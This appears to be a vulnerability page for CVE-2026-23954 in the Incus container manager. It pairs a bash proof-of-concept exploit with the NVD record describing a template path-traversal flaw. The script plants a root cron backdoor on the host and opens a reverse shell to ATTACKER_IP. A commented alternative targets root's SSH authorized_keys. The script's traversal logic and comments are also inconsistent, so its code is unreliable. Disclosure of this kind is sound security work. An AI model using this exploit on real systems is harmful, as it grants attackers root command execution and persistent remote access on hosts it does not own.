CVE-2026-23954

#!/bin/bash # CVE-2026-23954 PoC - Incus Template Arbitrary File Write # Requirements: User must be member of 'incus' group INCUS_IMAGE="malicious-template-image" CONTAINER_NAME="poc-container" # Step 1: Create a malicious template that writes to host filesystem cat > metadata.yaml << 'EOF' architecture: "$(uname -m)" creation_date: 1706000000 properties: architecture: "amd64" os: "Ubuntu" release: "jammy" templates: /etc/cron.d/backdoor: when: - create - start template: backdoor.template EOF # Step 2: Create malicious template content cat > backdoor.template << 'EOF' * * * * * root /bin/bash /tmp/shell.sh EOF # Step 3: Create malicious shell script to be written to host cat > shell.sh << 'EOF' #!/bin/bash bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 EOF # Step 4: Import image with malicious template incus image import metadata.yaml rootfs.squashfs --alias $INCUS_IMAGE # Step 5: Launch container - template will write to host via path traversal # The template path /etc/cron.d/backdoor with path traversal ../ becomes /cron.d/backdoor on host incus launch $INCUS_IMAGE $CONTAINER_NAME # Alternative exploitation using symbolic links: # Create a symlink in the template that points outside container # ln -s /root/.ssh/authorized_keys /var/lib/incus/storage-pools/default/images/timestamp/rootfs/etc/cron.d/malicious # Cleanup incus delete $CONTAINER_NAME --force incus image delete $INCUS_IMAGE

{"cve": {"id": "CVE-2026-23954", "sourceIdentifier": "[email protected]", "published": "2026-01-22T22:16:20.833", "lastModified": "2026-01-30T17:28:49.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g a member of the ‘incus’ group) to use directory traversal or symbolic links in the templating functionality to achieve host arbitrary file read, and host arbitrary file write. This ultimately results in arbitrary command execution on the host. When using an image with a metadata.yaml containing templates, both the source and target paths are not checked for symbolic links or directory traversal. This can also be exploited in IncusOS. A fix is planned for versions 6.0.6 and 6.21.0, but they have not been released at the time of publication."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y máquinas virtuales. Las versiones 6.21.0 e inferiores permiten a un usuario con la capacidad de lanzar un contenedor con una imagen personalizada (por ejemplo, un miembro del grupo 'incus') utilizar salto de directorio o enlaces simbólicos en la funcionalidad de plantillas para lograr la lectura arbitraria de archivos del host y la escritura arbitraria de archivos del host. Esto finalmente resulta en la ejecución arbitraria de comandos en el host. Al usar una imagen con un metadata.yaml que contiene plantillas, ni las rutas de origen ni las de destino se verifican en busca de enlaces simbólicos o salto de directorio. Esto también puede ser explotado en IncusOS. Se planea una corrección para las versiones 6.0.6 y 6.21.0, pero no han sido lanzadas en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.5", "matchCriteriaId": "0DF87DBE-86FF-4E74-8086-AE3360A94C71"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndExcluding": "6.21.0", "matchCriteriaId": "47AA575C-385C-4C34-8CC0-F370EC4ED7B4"}]}]}], "references": [{"url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7215", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lxc/incus/blob/HEAD/internal/server/instance/drivers/driver_lxc.go#L7294", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lxc/incus/security/advisories/GHSA-7f67-crqm-jgh7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/user-attachments/files/24473599/template_arbitrary_write.sh", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/user-attachments/files/24473601/templates_arbitrary_write.patch", "source": "[email protected]", "tags": ["Patch"]}]}}